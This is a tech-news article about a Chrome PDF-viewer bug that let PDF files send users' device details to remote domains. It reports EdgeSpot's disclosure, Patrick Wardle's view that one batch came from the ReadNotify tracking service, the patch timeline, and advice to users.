Google Chrome bug used in the wild to collect user data via PDF files


A security firm said this week that it discovered PDF documents exploiting a what the company called a Google Chrome browser "zero-day." The vulnerability allowed attackers to collect data from users who opened PDF files inside Chrome's built-in PDF viewer.
Security
Exploit detection service EdgeSpot, the company that found the files, says the PDF documents would contact a remote domain with information on the users' device --such as IP address, OS version, Chrome version, and the path of the PDF file on the user's computer.
This phone-home behavior did not take place when researchers opened the same PDF files in desktop PDF viewer apps, such as Adobe Reader and others, but was limited to Chrome only.
The company said it spotted two distinct sets of malicious PDF files exploiting this Chrome bug, with one series of files being circulated circa October 2017, and the second set in September 2018.
The first batch of malicious PDF files sent user data back to the "readnotify.com" domain, while the second sent it to "zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net," researchers said.
There was no additional malicious code in the PDF files that EdgeSpot discovered. However, collecting data on users who open a PDF file can aid attackers in fine-tuning future attacks and exploits.
But in a conversation with ZDNet after the publication of this story, Mac malware security expert Patrick Wardle explained that the first batch of files that EdgeSpot detected weren't meant to be malicious in nature, despite exploiting the Chrome bug. He said they were assembled using ReadNotify's PDF tracking service that lets users track when someone views their PDF files, a service that has been around since 2010.
"What the researchers 'uncovered' is just a document tagged by ReadNotify," Wardle told us, "but yes, Chrome should alert the user."
https://t.co/bH4YY0xPtL
— patrick wardle (@patrickwardle) February 28, 2019
Peeked at PDF & extracted JS 📝
"0day": Chrome doesn't alert when PDF submits data to remote server (can track PDF opens & survey/geolocate user)
How: via app.openDoc API & FDFs.
btw https://t.co/HA3qTcMEF7 has been doing this since (circa) 2010🤐🙈 pic.twitter.com/HUQZJApQGg
There is no information available on the second set of PDF files (the ones circulated in September 2018) and their nature --if they were assembled by a threat actor, if they're just tests, or were generated for benign user tracking purposes.
For its part, EdgeSpot said it notified Google over the Christmas holiday, last year, when they first discovered the documents. The Chrome team acknowledged the vulnerability and promised a fix for late April.
"We decided to release our finding prior to the patch because we think it's better to give the affected users a chance to be informed/alerted of the potential risk, since the active exploits/samples are in the wild while the patch is not near away," researchers said in a blog post yesterday.
The blog post also contains samples and indicators of compromise (IOCs) for the PDF files the company discovered.
Until a patch is out, EdgeSpot is recommending that users either use a desktop app to view PDF files or disable their internet connection while they open PDF documents in Chrome.
In unrelated research, but also connected to the world of PDF documents, earlier this week, security researchers revealed vulnerabilities that allowed them to fake signatures on 21 of 22 desktop PDF viewer apps and 5 out of 7 online PDF digital signing services.
Article updated with Wardle's analysis. Title updated accordingly.
All the Chromium-based browsers
More browser coverage:
- Google backtracks on Chrome modifications that would have crippled ad blockers
- A third of all Chrome extensions request access to user data on any site
- Microsoft Edge lets Facebook run Flash code behind users' backs
- Surveillance firm asks Mozilla to be included in Firefox's certificate whitelist
- New browser attack lets hackers run bad code even after users leave a web page
- Google working on new Chrome security feature to 'obliterate DOM XSS'
- What enterprises need to know about the new Chromium-based Edge TechRepublic
- Ad-blocking Brave gets memory advantage over Chrome on news websites CNET